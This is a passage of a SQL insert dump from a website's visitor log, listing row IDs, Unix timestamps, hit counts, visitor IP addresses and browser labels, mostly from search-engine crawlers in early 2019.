1,0,0,'91.196.177.46','firefox'),(379882,1548916319,1,1,0,0,'54.36.148.55','other'),(379883,1548916756,1,1,0,0,'54.36.148.104','other'),(379884,1548916927,2,2,0,0,'66.249.69.126','chrome'),(379885,1548916938,1,1,0,0,'91.196.178.73','firefox'),(379886,1548916986,3,3,0,0,'216.244.66.241','other'),(379887,1548916991,3,3,0,0,'66.249.69.122','chrome'),(379888,1548917126,2,2,0,0,'66.249.69.124','chrome'),(379889,1548917290,1,1,0,0,'54.36.149.25','other'),(379890,1548917737,1,1,0,0,'54.36.149.106','other'),(379891,1548918488,1,1,0,0,'54.36.148.68','other'),(379892,1548918711,1,1,0,0,'194.44.172.142','firefox'),(379893,1548919054,1,1,0,0,'54.36.148.37','other'),(379894,1548919055,1,1,0,0,'66.249.69.126','chrome'),(379895,1548919273,1,1,0,0,'46.229.168.135','other'),(379896,1548919403,1,1,0,0,'54.36.148.181','other'),(379897,1548919569,1,1,0,0,'54.36.149.18','other'),(379898,1548919608,1,1,0,0,'54.36.148.73','other'),(379899,1548919751,1,1,0,0,'91.196.178.66','chrome'),(379900,1548919893,1,1,0,0,'54.36.148.155','other'),(379901,1548919971,1,1,0,0,'66.249.69.122','chrome'),(379902,1548920085,1,1,0,0,'66.249.69.126','chrome'),(379903,1548920275,1,1,0,0,'46.229.168.152','other'),(379904,1548920354,2,2,0,0,'91.192.135.241','firefox'),(379905,1548920428,1,1,0,0,'216.244.66.241','other'),(379906,1548920705,2,2,0,0,'46.229.168.148','other'),(379907,1548920732,1,1,0,0,'66.249.69.72','chrome'),(379908,1548921103,1,1,0,0,'207.46.13.160','other'),(379909,1548921163,1,1,0,0,'66.249.69.124','chrome'),(379910,1548921554,1,1,0,0,'66.249.69.122','chrome'),(379911,1548921950,1,1,0,0,'93.171.154.159','chrome'),(379912,1548922104,1,1,0,0,'54.36.149.10','other'),(379913,1548922280,3,3,0,0,'216.244.66.241','other'),(379914,1548922422,1,1,0,0,'54.36.148.112','other'),(379915,1548922519,1,1,0,0,'54.36.148.70','other'),(379916,1548922625,1,1,0,0,'54.36.148.177','other'),(379917,1548922842,1,1,0,0,'54.36.148.241','other'),(379918,1548923467,1,1,0,0,'66.249.83.216','chrome'),(379919,1548923795,1,1,0,0,'91.196.178.73','firefox'),(379920,1548923927,1,1,0,0,'8.29.198.25','other'),(379921,1548924109,1,1,0,0,'54.36.149.31','other'),(379922,1548924360,1,1,0,0,'46.229.168.133','other'),(379923,1548924522,1,1,0,0,'91.196.178.172','chrome'),(379924,1548924676,1,1,0,0,'46.229.168.150','other'),(379925,1548924711,1,1,0,0,'54.36.149.11','other'),(379926,1548924779,1,1,0,0,'66.249.69.74','chrome'),(379927,1548925048,1,1,0,0,'46.229.168.154','other'),(379928,1548925150,1,1,0,0,'54.36.148.120','other'),(379929,1548925374,4,4,0,0,'216.244.66.241','other'),(379930,1548925705,1,1,0,0,'207.46.13.160','other'),(379931,1548925790,1,1,0,0,'46.229.168.140','other'),(379932,1548926009,1,1,0,0,'8.29.198.27','other'),(379933,1548926277,2,2,0,0,'66.249.69.122','chrome'),(379934,1548927116,1,1,0,0,'54.36.148.244','other'),(379935,1548927280,2,2,0,0,'216.244.66.241','other'),(379936,1548927320,1,1,0,0,'54.36.148.194','other'),(379937,1548927521,1,1,0,0,'54.36.148.149','other'),(379938,1548927918,1,1,0,0,'54.36.149.91','other'),(379939,1548928177,1,1,0,0,'54.36.148.138','other'),(379940,1548928455,1,1,0,0,'54.36.148.95','other'),(379941,1548928471,1,1,0,0,'46.229.168.144','other'),(379942,1548928569,2,2,0,0,'66.249.69.126','chrome'),(379943,1548929074,1,1,0,0,'54.36.149.56','other'),(379944,1548929489,1,1,0,0,'54.36.149.62','other'),(379945,1548929525,1,1,0,0,'91.196.178.66','chrome'),(379946,1548929946,1,1,0,0,'54.36.149.11','other'),(379947,1548930192,1,1,0,0,'54.36.148.234','other'),(379948,1548930240,1,1,0,0,'54.36.149.18','other'),(379949,1548930273,1,1,0,0,'54.36.148.215','other'),(379950,1548930602,1,1,0,0,'66.249.69.74','chrome'),(379951,1548930877,1,1,0,0,'66.249.69.122','chrome'),(379952,1548931032,1,1,0,0,'66.249.69.124','chrome'),(379953,1548931311,1,1,0,0,'54.36.149.65','other'),(379954,1548931392,1,1,0,0,'46.229.168.148','other'),(379955,1548932122,1,1,0,0,'46.229.168.150','other'),(379956,1548932311,1,1,0,0,'40.77.167.146','other'),(379957,1548932316,1,1,0,0,'37.53.123.48','chrome'),(379958,1548932555,1,1,0,0,'54.36.149.77','other'),(379959,1548932719,1,1,0,0,'40.77.167.180','other'),(379960,1548933010,1,1,0,0,'46.229.168.142','other'),(379961,1548933018,1,1,0,0,'37.187.96.78','chrome'),(379962,1548933232,2,2,0,0,'216.244.66.241','other'),(379963,1548933640,1,1,0,0,'40.77.167.146','other'),(379964,1548933648,1,1,0,0,'54.36.148.131','other'),(379965,1548933746,1,1,0,0,'54.36.148.152','other'),(379966,1548934165,1,1,0,0,'54.36.148.25','other'),(379967,1548934236,1,1,0,0,'54.36.148.14','other'),(379968,1548934258,1,1,0,0,'54.36.148.21','other'),(379969,1548934318,1,1,0,0,'66.249.69.126','chrome'),(379970,1548934660,1,1,0,0,'157.55.39.143','other'),(379971,1548934688,1,1,0,0,'207.46.13.160','other'),(379972,1548934776,1,1,0,0,'8.29.198.27','other'),(379973,1548935711,1,1,0,0,'92.112.5.128','chrome'),(379974,1548935724,1,1,0,0,'54.36.148.40','other'),(379975,1548935929,1,1,0,0,'66.249.69.122','chrome'),(379976,1548936135,1,1,0,0,'46.229.168.135','other'),(379977,1548936223,1,1,0,0,'66.249.69.124','chrome'),(379978,1548936275,1,1,0,0,'54.36.149.8','other'),(379979,1548936600,1,1,0,0,'46.229.168.145','other'),(379980,1548936853,1,1,0,0,'8.29.198.26','other'),(379981,1548936997,1,1,0,0,'54.36.148.21','other'),(379982,1548937096,1,1,0,0,'54.36.148.234','other'),(379983,1548937097,1,1,0,0,'54.36.148.52','other'),(379984,1548937163,1,1,0,0,'54.36.148.32','other'),(379985,1548937857,1,1,0,0,'66.249.69.122','chrome'),(379986,1548937927,1,1,0,0,'66.249.69.124','chrome'),(379987,1548938419,1,1,0,0,'54.36.148.253','other'),(379988,1548938484,1,1,0,0,'180.76.15.151','other'),(379989,1548938596,1,1,0,0,'195.10.210.70','chrome'),(379990,1548938677,1,1,0,0,'54.36.148.222','other'),(379991,1548938690,1,1,0,0,'54.36.149.44','other'),(379992,1548938784,1,1,0,0,'54.36.148.236','other'),(379993,1548938812,1,1,0,0,'216.244.66.241','other'),(379994,1548938905,3,3,0,0,'66.249.69.122','chrome'),(379995,1548939037,1,1,0,0,'54.36.148.115','other'),(379996,1548939207,1,1,0,0,'91.196.178.66','chrome'),(379997,1548939289,2,2,0,0,'66.249.69.126','chrome'),(379998,1548939325,2,2,0,0,'66.249.69.72','chrome'),(379999,1548939405,1,1,0,0,'54.36.148.174','other'),(380000,1548939440,3,3,0,0,'66.249.69.124','chrome'),(380001,1548939525,1,1,0,0,'91.196.178.78','chrome'),(380002,1548939969,1,1,0,0,'66.249.69.74','chrome'),(380003,1548940233,1,1,0,0,'54.36.148.184','other'),(380004,1548940314,1,1,0,0,'91.209.11.236','other'),(380005,1548940420,1,1,0,0,'66.249.69.126','chrome'),(380006,1548940510,1,1,0,0,'54.36.149.106','other'),(380007,1548940521,1,1,0,0,'91.196.178.66','chrome'),(380008,1548940611,1,1,0,0,'54.36.148.114','other'),(380009,1548940861,1,1,0,0,'54.36.148.156','other'),(380010,1548940969,1,1,0,0,'157.55.39.146','other'),(380011,1548940988,1,1,0,0,'54.36.148.26','other'),(380012,1548941174,1,1,0,0,'54.36.148.179','other'),(380013,1548941620,1,1,0,0,'66.249.69.124','chrome'),(380014,1548941767,1,1,0,0,'216.244.66.241','other'),(380015,1548941808,1,1,0,0,'178.63.68.137','firefox'),(380016,1548942039,16,16,0,0,'69.195.124.75','other'),(380017,1548942058,1,1,0,0,'46.229.168.153','other'),(380018,1548942286,1,1,0,0,'54.36.148.134','other'),(380019,1548942408,3,3,0,0,'66.249.69.122','chrome'),(380020,1548943663,1,1,0,0,'194.44.106.100','chrome'),(380021,1548943821,1,1,0,0,'54.36.148.214','other'),(380022,1548944411,1,1,0,0,'91.196.178.66','chrome'),(380023,1548944444,1,1,0,0,'91.224.97.40','chrome'),(380024,1548944501,1,1,0,0,'141.8.142.103','other'),(380025,1548944573,1,1,0,0,'54.36.148.136','other'),(380026,1548944617,1,1,0,0,'54.36.148.36','other'),(380027,1548944776,1,1,0,0,'216.244.66.241','other'),(380028,1548944852,1,1,0,0,'54.36.149.58','other'),(380029,1548945036,1,1,0,0,'46.229.168.148','other'),(380030,1548945166,1,1,0,0,'37.73.131.52','chrome'),(380031,1548945276,1,1,0,0,'5.45.207.79','other'),(380032,1548945321,4,4,0,0,'66.249.69.124','chrome'),(380033,1548945480,2,2,0,0,'31.43.19.82','chrome'),(380034,1548945503,1,1,0,0,'46.229.168.138','other'),(380035,1548945635,1,1,0,0,'8.29.198.25','other'),(380036,1548946000,1,1,0,0,'46.229.168.144','other'),(380037,1548946044,2,2,0,0,'66.249.69.122','chrome'),(380038,1548946527,1,1,0,0,'54.36.148.68','other'),(380039,1548946643,2,2,0,0,'216.244.66.241','other'),(380040,1548946659,2,2,0,0,'66.249.69.126','chrome'),(380041,1548946718,1,1,0,0,'54.36.148.202','other'),(380042,1548946948,1,1,0,0,'66.249.69.74','chrome'),(380043,1548947015,1,1,0,0,'66.249.69.124','chrome'),(380044,1548947481,1,1,0,0,'54.36.148.55','other'),(380045,1548947690,1,1,0,0,'8.29.198.26','other'),(380046,1548947701,1,1,0,0,'193.0.206.20','firefox'),(380047,1548948275,1,1,0,0,'66.249.69.72','chrome'),(380048,1548948387,1,1,0,0,'46.229.168.145','other'),(380049,1548948410,1,1,0,0,'46.229.168.129','other'),(380050,1548948554,1,1,0,0,'46.229.168.141','other'),(380051,1548948716,1,1,0,0,'54.36.148.40','other'),(380052,1548948911,1,1,0,0,'54.36.148.184','other'),(380053,1548949199,1,1,0,0,'46.229.168.148','other'),(380054,1548949203,1,1,0,0,'54.36.149.95','other'),(380055,1548949769,1,1,0,0,'178.17.171.194','chrome'),(380056,1548950237,1,1,0,0,'66.249.69.122','chrome'),(380057,1548950442,1,1,0,0,'66.249.69.124','chrome'),(380058,1548950547,2,2,0,0,'37.73.234.128','chrome'),(380059,1548950674,1,1,0,0,'31.13.127.8','other'),(380060,1548950676,1,1,0,0,'31.13.127.16','other'),(380061,1548950677,1,1,0,0,'31.13.127.7','other'),(380062,1548950678,1,1,0,0,'31.13.127.14','other'),(380063,1548950707,1,1,0,0,'69.171.251.33','other'),(380064,1548950716,1,1,0,0,'173.252.127.4','other'),(380065,1548950921,1,1,0,0,'54.36.149.35','other'),(380066,1548951305,1,1,0,0,'54.36.148.113','other'),(380067,1548951481,1,1,0,0,'37.115.190.172','chrome'),(380068,1548951631,1,1,0,0,'54.36.148.159','other'),(380069,1548951878,1,1,0,0,'66.249.69.126','chrome'),(380070,1548952053,1,1,0,0,'91.196.178.74','chrome'),(380071,1548952145,1,1,0,0,'216.244.66.241','other'),(380072,1548952207,1,1,0,0,'54.36.149.13','other'),(380073,1548952260,1,1,0,0,'66.249.69.124','chrome'),(380074,1548952262,1,1,0,0,'141.8.142.103','other'),(380075,1548952328,1,1,0,0,'54.36.148.151','other'),(380076,1548952592,1,1,0,0,'157.55.39.106','other'),(380077,1548953441,1,1,0,0,'54.36.149.32','other'),(380078,1548953661,1,1,0,0,'54.36.148.224','other'),(380079,1548953672,2,2,0,0,'66.249.65.196','chrome'),(380080,1548953759,1,1,0,0,'66.249.65.194','chrome'),(380081,1548953941,1,1,0,0,'54.36.148.197','other'),(380082,1548953950,1,1,0,0,'54.36.148.39','other'),(380083,1548954278,1,1,0,0,'157.55.39.143','other'),(380084,1548954396,1,1,0,0,'66.249.65.198','chrome'),(380085,1548954660,3,3,0,0,'216.244.66.241','other'),(380086,1548954706,1,1,0,0,'178.154.171.27','other'),(380087,1548954710,1,1,0,0,'5.255.253.38','other'),(380088,1548954825,1,1,0,0,'157.55.39.75','other'),(380089,1548954865,1,1,0,0,'54.36.149.70','other'),(380090,1548955226,18,18,0,0,'66.249.65.194','chrome'),(380091,1548955561,1,1,0,0,'54.36.148.63','other'),(380092,1548955575,3,3,0,0,'66.249.65.196','chrome'),(380093,1548955590,1,1,0,0,'66.249.73.31','chrome'),(380094,1548955689,1,1,0,0,'66.249.65.198','chrome'),(380095,1548955712,1,1,0,0,'46.229.168.138','other'),(380096,1548955781,1,1,0,0,'54.36.149.42','other'),(380097,1548955967,1,1,0,0,'46.211.25.247','chrome'),(380098,1548955984,1,1,0,0,'157.55.39.143','other'),(380099,1548956231,5,5,0,0,'66.249.65.194','chrome'),(380100,1548956285,1,1,0,0,'54.36.149.87','other'),(380101,1548956364,1,1,0,0,'157.55.39.78','other'),(380102,1548956493,1,1,0,0,'8.29.198.27','other'),(380103,1548956688,1,1,0,0,'91.196.178.76','firefox'),(380104,1548956704,1,1,0,0,'54.36.148.171','other'),(380105,1548956726,1,1,0,0,'54.36.148.29','other'),(380106,1548956856,1,1,0,0,'95.133.172.232','chrome'),(380107,1548957056,1,1,0,0,'54.36.149.78','other'),(380108,1548957116,1,1,0,0,'66.249.73.1','chrome'),(380109,1548957135,1,1,0,0,'54.36.148.234','other'),(380110,1548957401,1,1,0,0,'66.249.73.31','chrome'),(380111,1548957414,1,1,0,0,'54.36.148.109','other'),(380112,1548957462,2,2,0,0,'216.244.66.241','other'),(380113,1548957671,3,3,0,0,'66.249.65.196','chrome'),(380114,1548958177,2,2,0,0,'66.249.65.198','chrome'),(380115,1548958315,1,1,0,0,'54.36.148.122','other'),(380116,1548958398,1,1,0,0,'66.249.73.31','chrome'),(380117,1548958545,1,1,0,0,'66.249.65.194','chrome'),(380118,1548958553,1,1,0,0,'8.29.198.25','other'),(380119,1548958611,1,1,0,0,'46.229.168.149','other'),(380120,1548959061,1,1,0,0,'54.36.148.219','other'),(380121,1548959245,1,1,0,0,'54.36.148.228','other'),(380122,1548959845,1,1,0,0,'66.249.65.194','chrome'),(380123,1548959847,1,1,0,0,'54.36.149.51','other'),(380124,1548960109,2,2,0,0,'216.244.66.241','other'),(380125,1548960260,1,1,0,0,'54.36.148.190','other'),(380126,1548960276,1,1,0,0,'54.36.149.97','other'),(380127,1548960513,1,1,0,0,'13.127.182.126','firefox'),(380128,1548960679,1,1,0,0,'77.123.8.19','chrome'),(380129,1548960781,1,1,0,0,'54.36.148.152','other'),(380130,1548961059,1,1,0,0,'66.249.65.198','chrome'),(380131,1548961146,1,1,0,0,'66.249.73.1','chrome'),(380132,1548961202,2,2,0,0,'66.249.65.196','chrome'),(380133,1548961382,1,1,0,0,'46.229.168.130','other'),(380134,1548961444,1,1,0,0,'54.36.148.250','other'),(380135,1548961894,2,2,0,0,'66.249.65.194','chrome'),(380136,1548962083,1,1,0,0,'66.249.65.198','chrome'),(380137,1548962187,1,1,0,0,'54.36.148.34','other'),(380138,1548962230,1,1,0,0,'54.36.149.92','other'),(380139,1548962383,1,1,0,0,'157.55.39.78','other'),(380140,1548962465,1,1,0,0,'46.229.168.138','other'),(380141,1548962619,1,1,0,0,'54.36.149.65','other'),(380142,1548962840,1,1,0,0,'216.244.66.241','other'),(380143,1548963362,1,1,0,0,'46.229.168.150','other'),(380144,1548963461,1,1,0,0,'46.229.168.137','other'),(380145,1548963571,1,1,0,0,'54.36.148.97','other'),(380146,1548963670,1,1,0,0,'66.249.65.198','chrome'),(380147,1548963866,1,1,0,0,'216.244.66.241','other'),(380148,1548963926,1,1,0,0,'54.36.148.144','other'),(380149,1548965181,1,1,0,0,'157.55.39.115','other'),(380150,1548965805,1,1,0,0,'54.36.148.253','other'),(380151,1548965877,2,2,0,0,'216.244.66.241','other'),(380152,1548966030,1,1,0,0,'54.36.148.204','other'),(380153,1548966179,1,1,0,0,'54.36.148.116','other'),(380154,1548966201,1,1,0,0,'54.36.148.201','other'),(380155,1548966237,1,1,0,0,'66.249.73.72','chrome'),(380156,1548966262,1,1,0,0,'66.249.73.74','chrome'),(380157,1548966281,1,1,0,0,'66.249.79.74','chrome'),(380158,1548966327,1,1,0,0,'91.196.178.182','chrome'),(380159,1548966513,1,1,0,0,'54.36.148.166','other'),(380160,1548966655,1,1,0,0,'66.249.73.24','chrome'),(380161,1548966826,1,1,0,0,'180.76.15.156','other'),(380162,1548966907,1,1,0,0,'54.36.148.15','other'),(380163,1548967347,1,1,0,0,'8.29.198.27','other'),(380164,1548967876,9,9,0,0,'157.55.39.247','other'),(380165,1548968026,9,9,0,0,'157.55.39.54','other'),(380166,1548968864,1,1,0,0,'66.249.73.24','chrome'),(380167,1548968988,3,3,0,0,'216.244.66.241','other'),(380168,1548969270,1,1,0,0,'54.36.148.224','other'),(380169,1548969419,1,1,0,0,'8.29.198.27','other'),(380170,1548969690,1,1,0,0,'54.36.148.101','other'),(380171,1548969944,4,4,0,0,'157.55.39.78','other'),(380172,1548970295,1,1,0,0,'54.36.149.74','other'),(380173,1548970404,1,1,0,0,'46.229.168.137','other'),(380174,1548970607,1,1,0,0,'216.244.66.241','other'),(380175,1548971024,2,2,0,0,'157.55.39.78','other'),(380176,1548971536,1,1,0,0,'216.244.66.241','other'),(380177,1548971543,1,1,0,0,'157.55.39.247','other'),(380178,1548971601,1,1,0,0,'54.36.149.89','other'),(380179,1548971644,1,1,0,0,'54.36.148.25','other'),(380180,1548972648,1,1,0,0,'54.36.149.73','other'),(380181,1548973061,1,1,0,0,'54.36.148.115','other'),(380182,1548973212,1,1,0,0,'216.244.66.241','other'),(380183,1548973376,1,1,0,0,'54.36.149.72','other'),(380184,1548973538,1,1,0,0,'157.55.39.247','other'),(380185,1548973581,1,1,0,0,'54.36.148.207','other'),(380186,1548973630,1,1,0,0,'54.36.148.142','other'),(380187,1548973926,1,1,0,0,'54.36.148.167','other'),(380188,1548974208,1,1,0,0,'54.36.148.107','other'),(380189,1548974255,1,1,0,0,'46.229.168.134','other'),(380190,1548974826,1,1,0,0,'46.229.168.153','other'),(380191,1548975254,1,1,0,0,'54.36.149.61','other'),(380192,1548975494,2,2,0,0,'66.249.65.198','chrome'),(380193,1548975510,1,1,0,0,'66.249.73.31','chrome'),(380194,1548975776,1,1,0,0,'66.249.65.194','chrome'),(380195,1548975897,1,1,0,0,'66.249.65.196','chrome'),(380196,1548975916,1,1,0,0,'54.36.148.41','other'),(380197,1548976003,1,1,0,0,'66.249.73.1','chrome'),(380198,1548976067,1,1,0,0,'66.102.9.60','chrome'),(380199,1548976205,1,1,0,0,'54.36.149.76','other'),(380200,1548976213,1,1,0,0,'54.36.148.195','other'),(380201,1548976392,2,2,0,0,'46.229.168.144','other'),(380202,1548976504,1,1,0,0,'66.249.73.31','chrome'),(380203,1548976575,1,1,0,0,'216.244.66.241','other'),(380204,1548976743,1,1,0,0,'46.229.168.152','other'),(380205,1548977048,1,1,0,0,'54.36.149.11','other'),(380206,1548978021,1,1,0,0,'46.229.168.137','other'),(380207,1548978194,1,1,0,0,'8.29.198.25','other'),(380208,1548978295,1,1,0,0,'54.36.148.34','other'),(380209,1548978533,1,1,0,0,'54.36.149.81','other'),(380210,1548978709,1,1,0,0,'54.36.148.157','other'),(380211,1548978867,1,1,0,0,'54.36.148.181','other'),(380212,1548979212,3,3,0,0,'216.244.66.241','other'),(380213,1548979394,1,1,0,0,'54.36.149.63','other'),(380214,1548979444,1,1,0,0,'54.36.148.141','other'),(380215,1548979582,1,1,0,0,'178.255.215.94','other'),(380216,1548980259,1,1,0,0,'8.29.198.25','other'),(380217,1548980643,1,1,0,0,'54.36.149.51','other'),(380218,1548980745,1,1,0,0,'216.244.66.241','other'),(380219,1548980969,1,1,0,0,'46.229.168.146','other'),(380220,1548981062,1,1,0,0,'46.229.168.138','other'),(380221,1548981251,1,1,0,0,'40.77.167.89','other'),(380222,1548981257,1,1,0,0,'54.36.148.13','other'),(380223,1548982187,1,1,0,0,'54.36.148.77','other'),(380224,1548982290,1,1,0,0,'66.249.65.196','chrome'),(380225,1548982308,1,1,0,0,'54.36.148.55','other'),(380226,1548982351,1,1,0,0,'54.36.148.239','other'),(380227,1548982507,2,2,0,0,'66.249.65.198','chrome'),(380228,1548982515,1,1,0,0,'31.220.0.225','other'),(380229,1548982555,1,1,0,0,'216.244.66.241','other'),(380230,1548982778,1,1,0,0,'66.249.65.194','chrome'),(380231,1548982919,2,2,0,0,'46.229.168.139','other'),(380232,1548983287,1,1,0,0,'54.36.148.239','other'),(380233,1548983414,1,1,0,0,'54.36.149.38','other'),(380234,1548983426,1,1,0,0,'54.36.149.61','other'),(380235,1548984112,1,1,0,0,'54.36.148.149','other'),(380236,1548984115,1,1,0,0,'66.249.65.198','chrome'),(380237,1548984362,1,1,0,0,'54.36.148.60','other'),(380238,1548984420,1,1,0,0,'54.36.149.52','other'),(380239,1548984437,1,1,0,0,'46.229.168.130','other'),(380240,1548985035,1,1,0,0,'54.36.148.247','other'),(380241,1548985042,1,1,0,0,'54.36.148.23','other'),(380242,1548985251,1,1,0,0,'216.244.66.241','other'),(380243,1548985315,1,1,0,0,'54.36.148.164','other'),(380244,1548985804,1,1,0,0,'54.36.149.105','other'),(380245,1548985958,1,1,0,0,'54.36.148.230','other'),(380246,1548986216,1,1,0,0,'46.229.168.138','other'),(380247,1548986963,1,1,0,0,'89.178.225.19','msie'),(380248,1548987025,1,1,0,0,'46.229.168.147','other'),(380249,1548987374,1,1,0,0,'46.229.168.135','other'),(380250,1548987412,1,1,0,0,'54.36.149.48','other'),(380251,1548987590,1,1,0,0,'46.229.168.138','other'),(380252,1548987696,1,1,0,0,'66.249.73.31','chrome'),(380253,1548987992,1,1,0,0,'54.36.148.255','other'),(380254,1548988134,1,1,0,0,'54.36.148.80','other'),(380255,1548988376,1,1,0,0,'54.36.148.225','other'),(380256,1548988816,1,1,0,0,'66.249.65.196','chrome'),(380257,1548989039,1,1,0,0,'8.29.198.25','other'),(380258,1548989079,1,1,0,0,'54.36.149.32','other'),(380259,1548989140,1,1,0,0,'66.249.65.194','chrome'),(380260,1548989566,2,2,0,0,'66.249.73.30','chrome'),(380261,1548989628,2,2,0,0,'66.249.65.198','chrome'),(380262,1548989639,1,1,0,0,'216.244.66.241','other'),(380263,1548989907,1,1,0,0,'66.249.73.1','chrome'),(380264,1548989981,1,1,0,0,'54.36.148.95','other'),(380265,1548990107,1,1,0,0,'54.36.148.86','other'),(380266,1548990178,2,2,0,0,'66.249.65.196','chrome'),(380267,1548990245,1,1,0,0,'46.229.168.138','other'),(380268,1548990583,1,1,0,0,'54.36.148.66','other'),(380269,1548990599,1,1,0,0,'157.55.39.124','other'),(380270,1548990609,1,1,0,0,'54.36.148.204','other'),(380271,1548991107,1,1,0,0,'8.29.198.26','other'),(380272,1548991265,1,1,0,0,'54.36.148.151','other'),(380273,1548991551,1,1,0,0,'46.229.168.129','other'),(380274,1548992092,1,1,0,0,'66.249.65.198','chrome'),(380275,1548992286,1,1,0,0,'46.229.168.143','other'),(380276,1548992362,1,1,0,0,'165.227.71.50','other'),(380277,1548992406,1,1,0,0,'54.36.149.48','other'),(380278,1548992537,1,1,0,0,'54.36.149.60','other'),(380279,1548992780,1,1,0,0,'54.36.149.57','other'),(380280,1548992811,1,1,0,0,'54.36.148.223','other'),(380281,1548993235,1,1,0,0,'54.36.148.213','other'),(380282,1548993390,3,3,0,0,'66.249.65.194','chrome'),(380283,1548993520,1,1,0,0,'66.249.65.198','chrome'),(380284,1548993568,1,1,0,0,'66.249.73.31','chrome'),(380285,1548993836,3,3,0,0,'66.249.65.196','chrome'),(380286,1548993899,1,1,0,0,'54.36.149.92','other'),(380287,1548994332,1,1,0,0,'157.55.39.248','other'),(380288,1548994492,1,1,0,0,'54.36.148.36','other'),(380289,1548994535,1,1,0,0,'180.76.15.151','other'),(380290,1548994710,2,2,0,0,'66.249.65.194','chrome'),(380291,1548994751,1,1,0,0,'54.36.149.27','other'),(380292,1548994991,1,1,0,0,'54.36.149.96','other'),(380293,1548995120,1,1,0,0,'54.36.148.178','other'),(380294,1548995240,1,1,0,0,'66.249.65.196','chrome'),(380295,1548995487,1,1,0,0,'216.244.66.241','other'),(380296,1548995574,1,1,0,0,'54.36.148.248','other'),(380297,1548995640,1,1,0,0,'54.36.148.131','other'),(380298,1548995784,1,1,0,0,'54.36.149.94','other'),(380299,1548995890,3,3,0,0,'66.249.73.31','chrome'),(380300,1548996053,1,1,0,0,'91.196.178.134','firefox'),(380301,1548996368,1,1,0,0,'54.36.149.17','other'),(380302,1548996890,1,1,0,0,'66.249.73.31','chrome'),(380303,1548997407,1,1,0,0,'54.36.149.70','other'),(380304,1548997576,1,1,0,0,'54.36.149.57','other'),(380305,1548997995,1,1,0,0,'54.36.148.91','other'),(380306,1548998545,1,1,0,0,'54.36.148.241','other'),(380307,1548999150,1,1,0,0,'54.36.148.66','other'),(380308,1548999177,1,1,0,0,'54.36.148.212','other'),(380309,1548999599,2,2,0,0,'34.220.147.45','chrome'),(380310,1548999740,1,1,0,0,'66.249.73.1','chrome'),(380311,1548999884,1,1,0,0,'8.29.198.27','other'),(380312,1549000028,1,1,0,0,'54.36.148.178','other'),(380313,1549000136,1,1,0,0,'66.249.65.196','chrome'),(380314,1549000462,1,1,0,0,'54.36.148.254','other'),(380315,1549000483,2,2,0,0,'216.244.66.241','other'),(380316,1549000520,1,1,0,0,'66.249.73.31','chrome'),(380317,1549000851,2,2,0,0,'66.249.65.198','chrome'),(380318,1549001052,1,1,0,0,'178.154.244.11','other'),(380319,1549001248,1,1,0,0,'54.36.149.43','other'),(380320,1549001262,1,1,0,0,'66.249.65.194','chrome'),(380321,1549001472,1,1,0,0,'87.118.110.27','other'),(380322,1549001520,1,1,0,0,'178.17.171.194','chrome'),(380323,1549001615,1,1,0,0,'54.36.149.95','other'),(380324,1549001635,1,1,0,0,'54.36.148.59','other'),(380325,1549001917,1,1,0,0,'66.249.65.198','chrome'),(380326,1549001955,1,1,0,0,'8.29.198.26','other'),(380327,1549002504,1,1,0,0,'46.211.36.19','chrome'),(380328,1549002533,1,1,0,0,'54.36.148.157','other'),(380329,1549002753,2,2,0,0,'94.231.178.121','chrome'),(380330,1549002821,1,1,0,0,'91.196.178.75','chrome'),(380331,1549002955,1,1,0,0,'91.192.135.241','firefox'),(380332,1549003201,1,1,0,0,'54.36.148.46','other'),(380333,1549003636,2,2,0,0,'66.249.65.196','chrome'),(380334,1549003754,1,1,0,0,'216.244.66.241','other'),(380335,1549004014,1,1,0,0,'54.36.148.130','other'),(380336,1549004609,2,2,0,0,'66.249.65.194','chrome'),(380337,1549005011,1,1,0,0,'54.36.149.89','other'),(380338,1549005033,1,1,0,0,'207.46.13.19','other'),(380339,1549005048,2,2,0,0,'66.249.65.198','chrome'),(380340,1549005290,1,1,0,0,'54.36.148.17','other'),(380341,1549005583,1,1,0,0,'54.36.149.41','other'),(380342,1549005639,1,1,0,0,'40.77.167.159','other'),(380343,1549005684,1,1,0,0,'66.249.73.30','chrome'),(380344,1549005709,1,1,0,0,'54.36.149.39','other'),(380345,1549006191,1,1,0,0,'94.153.229.229','chrome'),(380346,1549006195,1,1,0,0,'54.36.148.49','other'),(380347,1549006241,2,2,0,0,'66.249.65.198','chrome'),(380348,1549006420,1,1,0,0,'54.36.148.196','other'),(380349,1549006456,2,2,0,0,'91.196.178.75','chrome'),(380350,1549006513,1,1,0,0,'54.36.148.30','other'),(380351,1549006669,1,1,0,0,'54.36.149.4','other'),(380352,1549006712,1,1,0,0,'54.36.148.238','other'),(380353,1549006890,2,2,0,0,'66.249.73.30','chrome'),(380354,1549006995,1,1,0,0,'54.36.148.14','other'),(380355,1549007081,2,2,0,0,'66.249.65.196','chrome'),(380356,1549007088,1,1,0,0,'54.36.148.104','other'),(380357,1549007179,1,1,0,0,'94.153.229.229','chrome'),(380358,1549007361,1,1,0,0,'54.36.148.42','other'),(380359,1549007466,1,1,0,0,'46.229.168.134','other'),(380360,1549007471,1,1,0,0,'66.249.65.198','chrome'),(380361,1549007477,1,1,0,0,'46.229.168.148','other'),(380362,1549007582,1,1,0,0,'54.36.148.242','other'),(380363,1549007686,1,1,0,0,'54.36.148.146','other'),(380364,1549008015,1,1,0,0,'54.36.148.63','other'),(380365,1549008186,1,1,0,0,'66.249.65.196','chrome'),(380366,1549008250,1,1,0,0,'91.196.178.75','chrome'),(380367,1549008331,2,2,0,0,'66.249.73.30','chrome'),(380368,1549008383,1,1,0,0,'46.229.168.140','other'),(380369,1549008552,1,1,0,0,'54.36.148.220','other'),(380370,1549008793,1,1,0,0,'37.54.115.135','firefox'),(380371,1549009041,1,1,0,0,'66.249.65.198','chrome'),(380372,1549009047,1,1,0,0,'216.244.66.241','other'),(380373,1549009253,3,3,0,0,'66.249.65.194','chrome'),(380374,1549009309,1,1,0,0,'207.46.13.225','other'),(380375,1549009325,1,1,0,0,'92.112.218.12','chrome'),(380376,1549009428,3,3,0,0,'66.249.65.196','chrome'),(380377,1549009445,1,1,0,0,'91.196.177.46','firefox'),(380378,1549009495,2,2,0,0,'66.249.73.30','chrome'),(380379,1549009565,1,1,0,0,'54.36.148.33','other'),(380380,1549009651,6,6,0,0,'40.77.167.159','other'),(380381,1549010196,1,1,0,0,'54.36.148.223','other'),(380382,1549010290,2,2,0,0,'66.249.73.1','chrome'),(380383,1549010379,1,1,0,0,'54.36.148.16','other'),(380384,1549010433,3,3,0,0,'66.249.65.196','chrome'),(380385,1549010466,1,1,0,0,'78.154.165.231','chrome'),(380386,1549010623,2,2,0,0,'66.249.65.194','chrome'),(380387,1549010742,1